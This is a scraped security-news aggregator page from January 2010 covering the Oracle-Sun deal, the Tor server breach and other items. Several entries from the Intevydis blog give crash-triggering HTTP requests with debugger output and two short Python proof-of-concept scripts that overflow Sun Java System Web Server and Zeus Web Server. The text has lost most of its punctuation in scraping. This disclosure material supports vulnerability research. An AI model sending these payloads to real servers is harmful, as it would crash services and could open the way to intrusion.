IMAGE http://www.secuobs.com/revue/news/186202.shtmlhttp://www.secuobs.com/revue/news/186202.shtml 2010-01-28 01:16:46 - Hack In The Box : With its deal of Sun Microsystems Inc finally official, Oracle Corp unveiled its strategic road map for the acquisition at a launch event Wednesday, promising to boost investments in Sunâ s UltraSparc, Java, and Solaris product lines While just getting to this road map event has been a long process for Oracle â which saw its US 74-billion deal slowed down by the European Commission last November â the delayed transaction has given the company more time to plan how exactly it will integrate the former hardware giant, said Oracle president Charles Phillips The plan for Phillips is quite simple Oracle will keep the Sun brand name and continue to pump money and resources into its newly acquired UltraSparc, Solaris, Java-powered product lines http://www.secuobs.com/revue/news/186072.shtmlhttp://www.secuobs.com/revue/news/186072.shtml 2010-01-27 22:39:07 - News : Oracle will pare back Sun Microsystems' server lines and move to a build-to-order model to cut costs and get the hardware company back to profitability, Oracle executives said on Wednesday IMAGE http://www.secuobs.com/revue/news/186022.shtmlhttp://www.secuobs.com/revue/news/186022.shtml 2010-01-27 22:12:12 - Dan Griffin's Blog : Check out Web Server Probe, a security tool contributed to CodePlex by some Microsoft Security MVPs including me From the Web Server Probe CodePlex wiki This is a tool for security researchers It allows you to search for either an IP address or a DNS name and display all associated domain names known to Bing If a http://www.secuobs.com/revue/news/186018.shtmlhttp://www.secuobs.com/revue/news/186018.shtml 2010-01-27 18:15:30 - Exploit DB updates : http://www.secuobs.com/revue/news/185920.shtmlhttp://www.secuobs.com/revue/news/185920.shtml 2010-01-27 07:57:31 - News : Oracle on Wednesday is expected to offer assurances that it will continue to invest in all of Sun Microsystems' main server platforms, in an effort to convince Sun customers that they should stick with those products as the database giant works to reinvent itself as a systems and software company IMAGE http://www.secuobs.com/revue/news/185722.shtmlhttp://www.secuobs.com/revue/news/185722.shtml 2010-01-27 01:22:02 - Hack In The Box : The administrators of the Tor anonymiser network are urging users to upgrade their software in the wake of a security breach A total of three servers belonging to the network were compromised in an attack by unidentified hackers who proceeded to use the machines as a base to launch other attacks The affected servers have since been refurnished, according to the team Downplaying the breach, developer Roger Dingledine explained, It appears the attackers didn't realize what they broke into--just that they had found some servers with lots of bandwidth For now, fresh identity keys have been created to replace the compromised ones, though users will need to upgrade to version 02122 or later in order to use the refurnished servers Tor is a popular software tool designed to allow users to maintain the privacy of their online activities by protecting against traffic analysis For now, the project says it has taken steps to harden systems to prevent this from reoccurring http://www.secuobs.com/revue/news/185645.shtmlhttp://www.secuobs.com/revue/news/185645.shtml 2010-01-26 23:40:01 - Exploit DB updates : http://www.secuobs.com/revue/news/185601.shtmlhttp://www.secuobs.com/revue/news/185601.shtml 2010-01-26 23:40:01 - Exploit DB updates : http://www.secuobs.com/revue/news/185600.shtmlhttp://www.secuobs.com/revue/news/185600.shtml 2010-01-26 17:33:48 - Global Security Mag Online : Atempo a annoncé que la société biopharmaceutique Transgene a choisi et mis en production le module de déduplication Atempo HyperStream pour optimiser ses sauvegardes et ses ressources de stockage Transgene conçoit et développe des produits d'immunothérapie pour le traitement des cancers et des maladies infectieuses chroniques Présente en France et aux Etats-Unis, Transgene emploie environ 235 personnes sur son site d'Illkirch et 15 autres personnes dans son laboratoire de recherche de Lyon De - Marchés http://www.secuobs.com/revue/news/185473.shtmlhttp://www.secuobs.com/revue/news/185473.shtml 2010-01-26 14:10:18 - CNIS mag : Cela faisait bien longtemps que l on n avait assisté à l un de ces feux d artifice d exploits et de révélations de failles Bien longtemps après le Month of Apple Bug ou le Month of Vista Bug, voici le mois du trou serveur , organisé par des chercheurs Russes, qui annoncent clairement la couleur Pas http://www.secuobs.com/revue/news/185413.shtmlhttp://www.secuobs.com/revue/news/185413.shtml 2010-01-25 17:54:56 - threatpost The First Stop for Security News : The Internet Systems Consortium ISC , the company behind the open source DNS BIND, software, has released security updates to resolve a DNSSEC-related vulnerability that could lead to Denial-of-Service DoS attacks Read the full article The H Security Shorten URL http threatpostcom en_us 3IX Click to copy to clipboard or post to Twitter http://www.secuobs.com/revue/news/185097.shtmlhttp://www.secuobs.com/revue/news/185097.shtml 2010-01-25 05:07:42 - Exploit DB updates : http://www.secuobs.com/revue/news/184971.shtmlhttp://www.secuobs.com/revue/news/184971.shtml 2010-01-25 02:32:39 - The Academy Pro : Today we have three Rapid 7 videos for you The featured video takes a look at how to scan a Windows 2003 Server and view the results The second and third videos focus on generating PDF reports and excluding vulnerabilities from reports Thank you all for your on-going support and recommendations Peter Giannoulis The Academy Pro wwwtheacademyprocom This update has http://www.secuobs.com/revue/news/184959.shtmlhttp://www.secuobs.com/revue/news/184959.shtml 2010-01-23 12:20:57 - Rootsecure.net : H Security Tor Project servers hacked http://www.secuobs.com/revue/news/184745.shtmlhttp://www.secuobs.com/revue/news/184745.shtml 2010-01-23 11:44:17 - Vigilance vulnérabilités publiques : Un attaquant non authentifié peut envoyer une requête HTTP incorrecte sur le serveur d'administration de Sun Java System Web Server, afin de le stopper http://www.secuobs.com/revue/news/184742.shtmlhttp://www.secuobs.com/revue/news/184742.shtml 2010-01-23 01:15:53 - Packet Storm Security Exploits : The Joomla Gameserver component version 12 suffers from a remote SQL injection vulnerability http://www.secuobs.com/revue/news/184652.shtmlhttp://www.secuobs.com/revue/news/184652.shtml 2010-01-22 23:11:42 - LinuxSecurity.com Latest News : LinuxSecuritycom The TOR Project is advising users to upgrade to a new version of the software following a hack that compromised three of its servers TOR, short for The Onion Router, is a worldwide network of servers that are used to help anonymize people's Web surfing Web traffic is randomly routed through many servers, masking critical information such as someone's true IP Internet Protocol address http://www.secuobs.com/revue/news/184605.shtmlhttp://www.secuobs.com/revue/news/184605.shtml 2010-01-22 21:21:34 - What's New Cenzic Security Blog : Weekly product update Cenzic detects a Java System Web Server Remote Code Execution Vulnerability As of January 22, 2010 Cenzic now detects a Java System Web Server Remote Code Execution Vulnerability BugtraqID 37641 Sun Java System Web Server is prone to a remote code execution vulnerability Attackers can exploit this issue to execute code within the context of the affected application Sun Java System Web Server 70 Update 6 is vulnerable, however other versions may also be affected Background on Cenzic s SmartAttacks Every week, Cenzic s suite of products is updated with the latest vulnerabilities custom, commercial, and open-source to better detect holes in Web applications These Web application vulnerabilities include but not limited to cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types by Erin Swanson Eswanson cenziccom See Also Java System Web Server Remote Code Execution Vulnerability Learn more about this vulnerability on Security Focus http://www.secuobs.com/revue/news/184574.shtmlhttp://www.secuobs.com/revue/news/184574.shtml 2010-01-22 19:13:27 - News : The TOR Project is advising users to upgrade to a new version of the software following a hack that compromised three of its servers IMAGE http://www.secuobs.com/revue/news/184537.shtmlhttp://www.secuobs.com/revue/news/184537.shtml 2010-01-22 18:43:46 - Exploit DB updates : http://www.secuobs.com/revue/news/184529.shtmlhttp://www.secuobs.com/revue/news/184529.shtml 2010-01-22 17:22:33 - threatpost The First Stop for Security News : Two of the seven directory authority servers that the Tor Project uses to run its anonymous browsing service have been compromised, along with a new server that the project uses to host metrics and graphs Shorten URL http threatpostcom en_us 3Xf Click to copy to clipboard or post to Twitter http://www.secuobs.com/revue/news/184502.shtmlhttp://www.secuobs.com/revue/news/184502.shtml 2010-01-22 06:02:56 - Intevydis blog : This is pretty useless but funny null ptr dereference bug It exists at leas in 70u6, latest 70u7 should be affected as well To trigger send HTTP 10 n n to admin server, it will crash Program received signal SIGSEGV, Segmentation fault Switching to Thread 0x97d53b90 LWP 4117 0xb7d85ee6 in INTpblock_copy from opt sun webserver7 lib libns-httpd40so gdb x i eip 0xb7d85ee6 repnz scas pourcentses pourcentsedi ,pourcentsal gdb i r edi edi 0x0 0 http://www.secuobs.com/revue/news/184325.shtmlhttp://www.secuobs.com/revue/news/184325.shtml 2010-01-22 06:02:56 - Intevydis blog : Tested on 70u6, latest 70u7 should be buggy as well To trigger send the following request s PROPFIND pages HTTP 11 n WebDAV URI s Host localhost n s Depth 0 n s Content-Length 58 n s Content-Type application xml n n s The 'webservd' process will crash Program received signal SIGSEGV, Segmentation fault Switching to Thread 0x9807eb90 LWP 4028 0xb6b0b1e0 in dosprintf from opt sun webserver7 lib libnspr4so gdb x i eip 0xb6b0b1e0 mov pourcentseax, pourcentsedx gdb i r eax edx eax 0x23 35 edx 0x2000 8192 gdb http://www.secuobs.com/revue/news/184324.shtmlhttp://www.secuobs.com/revue/news/184324.shtml 2010-01-22 02:45:37 - Exploit DB updates : http://www.secuobs.com/revue/news/184280.shtmlhttp://www.secuobs.com/revue/news/184280.shtml 2010-01-21 14:25:28 - Exploit DB updates : http://www.secuobs.com/revue/news/184004.shtmlhttp://www.secuobs.com/revue/news/184004.shtml 2010-01-21 05:19:11 - 4sysops : Submitted by Dennis Smith Blog Gourami Farm Commander looks a lot like Norton Commander and Total Commander, but the functionality is very different With Total Commander both the left and right panel are file systems With Farm Commander the left panel displays file system, where you can select files and directories In the right panel http://www.secuobs.com/revue/news/183908.shtmlhttp://www.secuobs.com/revue/news/183908.shtml 2010-01-21 00:29:21 - Intevydis blog : Another remote heap overflow It can be triggered in the default install We've discovered the bug about month ago, it is in Vulndisco since Jan 8 To trigger send the following request buf PUT HTTP 10 n buf Authorization Digest buf ABCD, 1000 buf n n Attach to webservd process Program received signal SIGSEGV, Segmentation fault Switching to Thread 0x96a8eb90 LWP 3640 0xb6732825 in strncmp from lib tls i686 cmov libcso6 gdb bt 0 0xb6732825 in strncmp from lib tls i686 cmov libcso6 1 0xb7d35a60 in from opt sun webserver7 lib libns-httpd40so 2 0xb7d357fc in parse_digest_user_login from opt sun webserver7 lib libns-httpd40so 3 0xb7d35518 in get_user_login_basic from opt sun webserver7 lib libns-httpd40so 4 0xb7d9cb55 in ACL_GetAttribute from opt sun webserver7 lib libns-httpd40so 5 0xb7da9dac in fileacl_user_get from opt sun webserver7 lib libns-httpd40so 6 0xb7d9cb55 in ACL_GetAttribute from opt sun webserver7 lib libns-httpd40so 7 0xb7d34d6b in get_auth_user_basic from opt sun webserver7 lib libns-httpd40so 8 0xb7d9cb55 in ACL_GetAttribute from opt sun webserver7 lib libns-httpd40so 9 0xb7da7af4 in LASUserEval from opt sun webserver7 lib libns-httpd40so 10 0xb7d9ada8 in ACLEvalAce from opt sun webserver7 lib libns-httpd40so 11 0xb7d9baba in from opt sun webserver7 lib libns-httpd40so 12 0xb7d9b6cf in ACL_EvalTestRights from opt sun webserver7 lib libns-httpd40so 13 0xb7d1329b in ACL_SetupEval from opt sun webserver7 lib libns-httpd40so 14 0xb7d0bb24 in INTservact_pathchecks from opt sun webserver7 lib libns-httpd40so 15 0xb7d0cd12 in INTservact_handle_processed from opt sun webserver7 lib libns-httpd40so 16 0xb7d5a5d0 in HttpRequest UnacceleratedRespond from opt sun webserver7 lib libns-httpd40so 17 0xb7d59ba5 in HttpRequest HandleRequest from opt sun webserver7 lib libns-httpd40so 18 0xb7d589aa in DaemonSession run from opt sun webserver7 lib libns-httpd40so 19 0xb7be26f0 in ThreadMain from opt sun webserver7 lib libnsprwrapso 20 0xb69a8914 in _pt_root from opt sun webserver7 lib libnspr4so 21 0xb69614ff in start_thread from lib tls i686 cmov libpthreadso0 22 0xb679f49e in clone from lib tls i686 cmov libcso6 gdb x 1i eip 0xb6732825 movzbl pourcentsedx ,pourcentsedx gdb i r edx edx 0x44434241 1145258561 http://www.secuobs.com/revue/news/183827.shtmlhttp://www.secuobs.com/revue/news/183827.shtml 2010-01-20 18:45:07 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/183718.shtmlhttp://www.secuobs.com/revue/news/183718.shtml 2010-01-20 16:16:22 - Security : Most people don t start thinking they need a load balancer until they need a second server But even if you ve only got one server a load balancer can help with availability, with performance, and make the transition later on to a multiple server site a whole lot easier Before we reveal the secret sauce, let me first say that if you have only one server and the application crashes or the network stack flakes out, you re out of luck There are a lot of confusedthings load balancers application delivery controllers can do with only one server, but automagically fixing application crashes or network connectivity issues ain t in the list If these are concerns, then you really do need a second server But if you re just worried about standing up to the load then a Load balancer for even a single server can definitely give you a boost --------------------------------------------------------------------- HERE COMES THE SCIENCE --------------------------------------------------------------------- 1 A modern load balancer, aka application delivery controller, can optimize TCP connections via TCP multiplexing This will improve resource RAM, CPU utilization and increase the total number of concurrent users you can serve on a single server In the face of a request onslaught, this one feature may be the difference between users seeing Connection Timed Out and your content 2 Offloading CPU intense operations like compression and SSL operations also improves capacity by letting your application spend time on application logic rather than ancillary encryption functions Depending on the size and type of content and length of keys, this can net you a nice boost in not only capacity but also performance 3 Applying security at the edge of the network before it gets to the server can alleviate a lot of painful processing that essentially results in nothing more than a rejection or worse, a compromised site Protocol layer security detects and mitigates DoS attacks, manipulation of protocols as an attempted exploit of the network, and other protocol related attacks Rather than wasting server resources on these useless packets, a load balancer application delivery controller can do it at the point of entry, thus improving the capacity of the server to handle legitimate requests Now it is absolutely true that what these techniques offer is a way to increase capacity, which may in most cases keep a site available But there are always situations in which the load is just too much for a single server and in that case, you re going to have to bite the bullet and either build out a cloud bursting architecture, invest in more servers, or move to a cloud environment The good news is that these techniques work just as well for two or three or four hundred servers as it does for one There s also the added benefit that if you do need to scale out and add a second or third server in the future that it can be done in a non-disruptive manner if you already have a load balancing application delivery solution in place Just add the server to the load balancer and voila Scalability It s really that easy If you don t start with one you may have some network and or server reconfiguration that needs to be accomplished and that can often result in the dreaded D word downtime So if you were thinking that you didn t need a load balancing solution because you only had one server, or that there s really not much that can be done to improve the capacity of a single server and keep a site available, think again There just might be a solution after all WILS Write It Like Seth Seth Godin always gets his point across with brevity and wit WILS is an ATTEMPT TO BE concise about application delivery TOPICS AND just get straight to the point NO DILLY DALLYING AROUND Follow me on Twitter IMAGE IMAGE IMAGE View Lori's profile on SlideShare IMAGE friendfeed icon_facebook AddThis Feed Button Bookmark and Share Related blogs articles Long Live d AJAX When Is More Important Than Where in Web Application Security I am wondering why not all websites enabling this great feature GZIP It s 2am Do You Know What Algorithm Your Load Balancer is Using WILS Three Ways To Better Utilize Resources In Any Data Center WILS Why Does Load Balancing Improve Application Performance WILS Application Acceleration versus Optimization All WILS Topics on DevCentral What is server offload and why do I need it Technorati Tags MacVittie,F5,load balancing,availability,application delivery controller,downtime,compression,ssl,offload,capacity,performance,WILS IMAGE http://www.secuobs.com/revue/news/183657.shtmlhttp://www.secuobs.com/revue/news/183657.shtml 2010-01-20 04:18:34 - The Academy Pro : Today we have two GFI videos for you The featured video demonstrates how to enable logging with GFI s Network Server Monitor 7 product The second video simply focuses on the installation of the product Thank you all for your on-going support and recommendations Peter Giannoulis The Academy Pro wwwtheacademyprocom This update has been brought to you by Check Point Software Technologies, Sourcefire, Peer http://www.secuobs.com/revue/news/183401.shtmlhttp://www.secuobs.com/revue/news/183401.shtml 2010-01-20 03:36:22 - MX Logic Security News : Researchers at VeriSign's iDefense lab have published a report claiming that the Chinese government was responsible for the recent large-scale cyber attacks that targeted Google and other US companies Ars Technica says that the report unambiguously declares that the Chinese government was, in fact, behind the effort , and that the two command-and-control servers believed to have been the driving forces behind the attacks were the same ones used in a similar but smaller-scale attack performed this summer Ars Technica further asserted that, if the report's findings are correct, it suggests that the government of China has been engaged for months in a massive campaign of industrial espionage against US companies The US government has raised the issue with China State Department spokesman PJ Crowley told Reuters that we have serious concerns about this and its ramifications, and we're going to continue our dialogue with China on these and other kinds of issues Additionally, Reuters said that the White House issued its own condemnation of the attacks and expressed its support for GoogleADNFCR-1765-ID-19566628-ADNFCR http://www.secuobs.com/revue/news/183364.shtmlhttp://www.secuobs.com/revue/news/183364.shtml 2010-01-20 00:01:01 - Intevydis blog : Trivial to find and exploit stack overflow vulnerability To trigger send the following request s OPTIONS s my_dav_directory DAV URI dav support should be enabled for this directory s P 500 s HTTP 10 n n As a result of this request 'webservd' process will crash Program received signal SIGSEGV, Segmentation fault Switching to Thread 0x969fcb90 LWP 3534 0xb5ae46e7 in DACL_ReadDACLFile from opt sun webserver7 lib libdavpluginso gdb bt 0 0xb5ae46e7 in DACL_ReadDACLFile from opt sun webserver7 lib libdavpluginso 1 0xb5ae1b7c in DACL_GetDACLListForUri from opt sun webserver7 lib libdavpluginso 2 0x41414141 in Backtrace stopped previous frame inner to this frame corrupt stack http://www.secuobs.com/revue/news/183275.shtmlhttp://www.secuobs.com/revue/news/183275.shtml 2010-01-19 21:54:18 - News : SQL Server 2008 R2, the latest version of Microsoft's flagship database, will be generally available in May, the company said Tuesday IMAGE http://www.secuobs.com/revue/news/183225.shtmlhttp://www.secuobs.com/revue/news/183225.shtml 2010-01-19 00:33:41 - Intevydis blog : This cool bug has been found at Nov, 2009 By sending a malformed TRACE request it is possible to overwrite heap and leak portions of server's memory Tested against SJWS 70 u7 usr bin env python sun_tracepy Use this code at your own risk Never run it against a production system THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE import socket import sys def send_req host,port buf TRACE pourcentss HTTP 10 n pourcents A 4074 for i in range 0,10 buf pourcentsd pourcentsi n for i in range ord 'a' , ord 'z' buf chr i n buf n sock socketsocket socketAF_INET, socketSOCK_STREAM sockconnect host,port socksendall buf resp while 1 s sockrecv 4000 if len s 1 break resp s print list resp if __name__ main__ if len sysargv 3 print usage pourcentss host port pourcents sysargv 0 sysexit send_req sysargv 1 ,int sysargv 2 http://www.secuobs.com/revue/news/182931.shtmlhttp://www.secuobs.com/revue/news/182931.shtml 2010-01-19 00:29:55 - Exploit DB updates : http://www.secuobs.com/revue/news/182930.shtmlhttp://www.secuobs.com/revue/news/182930.shtml 2010-01-18 23:25:56 - Jack Mannino : So this one is pretty interesting, and happens in a lot more instances than I originally thought it would The public crossdomainxml file for this particular server shown below has references to internal web servers via allow-access-from-domain What this means is that the developers have given their internal servers the ability to read data from the Flash domain of their external server Without going too deep into the nitty gritty of Flash and crossdomainxml, read Adobe's much better explanation here What you will see and should take away from this picture below is that these are internal resource addresses of very critical resources, likely internal websites This gives you the immediate connection that there is a sort of transitive trust likely present As the external site trusts the internal site, the internal site likely trusts the external site If XSS or any method exists to have users execute malicious Flash objects while visiting the external site from within the NAT gateway where the 10xxx addresses are relevant , it may be possible to easily launch attacks on internal web servers The Flash objects could contain scripting and attack code to launch from within the INTERNAL USER's browser, with code to do things like perform SQL Injection on an internal server Internal web servers won't typically be afforded much attention, and they often go without proper code reviews or development processes It is assumed that because they are internal, they are unreachable Not at all the case More to comemight have shifted my submission for Shmoo to this area Lots of fun stuff to explore -Jack http://www.secuobs.com/revue/news/182907.shtmlhttp://www.secuobs.com/revue/news/182907.shtml 2010-01-18 20:08:31 - Rootsecure.net : Darknet Microsoft SQL Server Fingerprint Tool BETA4 http://www.secuobs.com/revue/news/182828.shtmlhttp://www.secuobs.com/revue/news/182828.shtml 2010-01-18 11:46:26 - Vigilance vulnérabilités publiques : Un attaquant peut envoyer une requête LDAP illicite vers Sun Directory Server, afin de le stopper http://www.secuobs.com/revue/news/182683.shtmlhttp://www.secuobs.com/revue/news/182683.shtml 2010-01-18 11:30:24 - Darknet The Darkside : http://www.secuobs.com/revue/news/182680.shtmlhttp://www.secuobs.com/revue/news/182680.shtml 2010-01-18 01:08:10 - Packet Storm Security Exploits : Web Server Creator version 01 suffers from cross site scripting, remote file inclusion and directory traversal vulnerabilities http://www.secuobs.com/revue/news/182581.shtmlhttp://www.secuobs.com/revue/news/182581.shtml 2010-01-17 23:52:39 - Intevydis blog : Here is the first bug for the Week of Web Server BUGS Buffer overflow in Zeus Web Server 43r4 SSL2 implementation SSL2_CLIENT_HELLO It is a rather fresh bug, discovered a few weeks ago Trigger is below usr bin env python zeus_ssl2py Use this code at your own risk Never run it against a production system THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE import socket import sys import struct def send_req host,port buf buf chr 1 buf x00 x02 buf structpack H ,21 buf structpack H ,0xffff buf structpack H ,16 buf x07 x00 xc0 x03 x00 x80 x01 x00 x80 x08 x00 x80 buf x06 x00 x40 x04 x00 x80 x02 x00 x80 buf A 50000 buf C 16 siz chr len buf 0xff00 8 0x80 chr len buf 0xff buf siz buf sock socketsocket socketAF_INET, socketSOCK_STREAM sockconnect host,port socksendall buf sockrecv 1000 sockclose if __name__ main__ if len sysargv 3 print usage pourcentss host port pourcents sysargv 0 sysexit send_req sysargv 1 ,int sysargv 2 http://www.secuobs.com/revue/news/182575.shtmlhttp://www.secuobs.com/revue/news/182575.shtml 2010-01-16 13:17:08 - How to remove : The file name webserverexe has appeared in an virus analysis report You can see it on this link Threatexpert identifies this as a trojan virusIt creates a malicious service named webserverIt may download more files from the internet A good Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/182360.shtmlhttp://www.secuobs.com/revue/news/182360.shtml